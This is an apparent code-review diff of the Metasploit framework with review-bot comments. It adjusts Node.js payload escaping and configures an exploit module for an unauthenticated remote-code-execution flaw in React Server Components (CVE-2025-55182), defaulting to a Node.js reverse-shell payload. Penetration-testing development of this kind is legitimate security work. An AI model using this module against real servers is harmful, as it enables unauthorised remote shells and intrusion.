diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb
index 89190672acf88..8080f3642ad07 100644
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={})
 # @param [String] code the javascript code to run
 # @return [String] a command that invokes "node" and passes the code
 def nodejs_cmd(code)
- "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
+ "node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
 end
 end
diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
index 695b4a1994baa..6d6fa41ef2e42 100644
--- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
+++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
 ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
 ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
 ],
- 'Platform' => ['multi'],
+ 'Platform' => %w[unix linux win],
 'Arch' => [ARCH_CMD],
 'Targets' => [
 [
@@ -40,8 +40,9 @@ def initialize(info = {})
 {
 'Platform' => ['unix', 'linux'],
 'DefaultOptions' => {
- 'FETCH_COMMAND' => 'WGET'
+ 'PAYLOAD' => 'cmd/unix/reverse_nodejs'
 }
+ # Tested with cmd/unix/reverse_nodejs
 # Tested with cmd/unix/reverse_bash
 # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
 }
@@ -55,7 +56,10 @@ def initialize(info = {})
 ],
 ],
 'Payload' => {
- 'BadChars' => '"'
+ 'BadChars' => '"',
+ 'Space' => 131068,
+ 'DisableNops' => true,
+ 'Encoder' => 'cmd/base64'
 },
 'DefaultTarget' => 0,
 'DisclosureDate' => '2025-12-03',
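Review bot: In `nodejs_cmd` (lib/msf/core/payload/nodejs.rb), the `\s` in `/[^a-z0-9\s]/i` leaves every whitespace character unescaped, including line feeds, carriage returns and tabs, not just spaces. A raw line terminator inside the double-quoted JavaScript string handed to `eval` is a syntax error, whereas the removed line hex-escaped the whole input, so this changes behaviour for any caller that passes multi-line code (callers are outside this hunk). Keeping only the literal space verbatim avoids that: `code.gsub(/[^a-z0-9 ]/i) { |char| Rex::Text.to_hex(char, '\\x') }`. The `@return` comment could also state that alphanumerics and spaces are emitted as-is and everything else as `\xNN`, since that property is what keeps the single-quoted shell argument intact.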
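Review bot: `'Space' => 131068` in the `'Payload'` hash of react2shell_unauth_rce_cve_2025_55182.rb (last hunk) is an unexplained magic number; it equals 131072 - 4, but nothing in the hunk says which limit it tracks. A comment such as `# 128 KiB - 4: <limit this value is derived from>` would let the next maintainer verify it. The hash is module-wide, so this size and `'Encoder' => 'cmd/base64'` presumably apply to every entry in `'Targets'`, including any non-Unix target now that `'Platform'` lists `win`; if a target needs different values, they should be set on that target instead. `initialize` starts and ends outside the hunk, so the other targets are not visible here.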